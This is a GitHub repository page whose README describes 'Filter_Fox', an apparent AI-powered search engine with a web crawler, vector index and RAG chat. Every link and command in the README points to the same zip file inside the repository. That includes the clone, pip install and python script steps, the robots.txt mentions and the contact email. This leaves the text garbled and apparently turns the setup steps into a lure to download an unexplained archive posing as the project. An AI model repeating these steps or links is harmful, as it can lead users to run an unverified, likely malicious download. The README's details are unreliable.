Skip to content

Sam-bot-dev/Filterfox

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

32 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🦊 Filter_Fox

MIT License Project Status RAG Powered

πŸ” Intelligent Search Engine + πŸ€– AI Chat (Filter_GPT)

Filter_Fox is a next-generation AI-powered search engine that combines
web crawling, semantic search, and RAG (Retrieval-Augmented Generation)
to deliver accurate, explainable, and source-backed answers.


✨ Why Filter_Fox?

Traditional search engines return links.
Filter_Fox returns understanding.

βœ” Crawls the web legally
βœ” Builds its own searchable knowledge base
βœ” Uses vector search + LLM reasoning
βœ” Generates answers with citations
βœ” Clean, professional UI (no blue tones)


🧠 How It Works

🌐 Websites

↓

πŸ•·οΈ Web Crawler

↓

πŸ“„ Page Storage

↓

βœ‚οΈ Text Chunking

↓

🧬 Embeddings

↓

πŸ“¦ Vector Database (FAISS)

↓

πŸ” Semantic Retrieval

↓

πŸ€– Filter_GPT (RAG)

↓

βœ… Final Answer + Sources


πŸ€– Filter_GPT (LLM Interface)

A modern AI chat interface inspired by ChatGPT and Google Gemini:

  • Context-aware answers
  • Follow-up questions
  • Source citations
  • Clean light/dark UI
  • Developer-friendly design

πŸ–₯️ Features

πŸ”Ž Search Engine

  • Web / Images / Videos / News
  • Advanced search filters
  • Saved searches & history
  • Privacy-first design

🧠 AI + RAG

  • Semantic search (embeddings)
  • Retrieval-Augmented Generation
  • Reduced hallucinations
  • Grounded answers

πŸ•·οΈ Web Crawler

  • Respects https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
  • Polite crawl delays
  • Domain-restricted crawling
  • Incremental storage

πŸ› οΈ Tech Stack

Backend

  • 🐍 Python
  • 🌐 Requests, BeautifulSoup
  • πŸ“š FAISS (Vector DB)
  • 🧠 Sentence Transformers

AI / ML

  • Retrieval-Augmented Generation (RAG)
  • LLM (OpenAI / Local models)
  • Chunk-based indexing

Frontend

  • HTML + Tailwind CSS
  • Modern UI (Filter_GPT)
  • Responsive design

πŸš€ Getting Started

1️⃣ Clone the Repository

git clone https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
cd filter_fox

2️⃣ Install Dependencies

pip install -r https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

3️⃣ Run the Web Crawler

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

4️⃣ Build the Index

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

5️⃣ Ask Questions with Filter_GPT(UnderProduction)

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

πŸ” Privacy & Ethics

βœ” Respects https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

βœ” Crawls only public pages

βœ” No personal data scraping

βœ” No login-protected content

βœ” Transparent, ethical crawling


πŸ“Š Project Status

Component Status
Web Crawler 🚧 In Progress
Indexer 🚧 In Progress
Vector Search 🚧 In Progress
RAG Pipeline βœ… Complete
Search UI 🚧 In Progress
Filter_GPT UI 🚧 In Progress

πŸ—ΊοΈ Roadmap

Hybrid Ranking (BM25 + Vector)

Sitemap support

Incremental crawling

Admin dashboard

Browser extension

Mobile UI

Local LLM support


🀝 Contributing

Contributions are welcome! You can:

Open issues

Suggest features

Submit pull requests


πŸ“¬ Contact

πŸ“§ Email: https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

πŸ™ GitHub: @Sam-bot-dev



πŸ“œ License

This project is licensed under the MIT License.

βœ” Free to use
βœ” Free to modify
βœ” Free to distribute

See the full license text here β†’ LICENSE

πŸ”— Connect With Me

Bhavesh
Lead Dev
Bhavesh
🌐 GitHub

About

A Next-generation AI-powered search engine

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors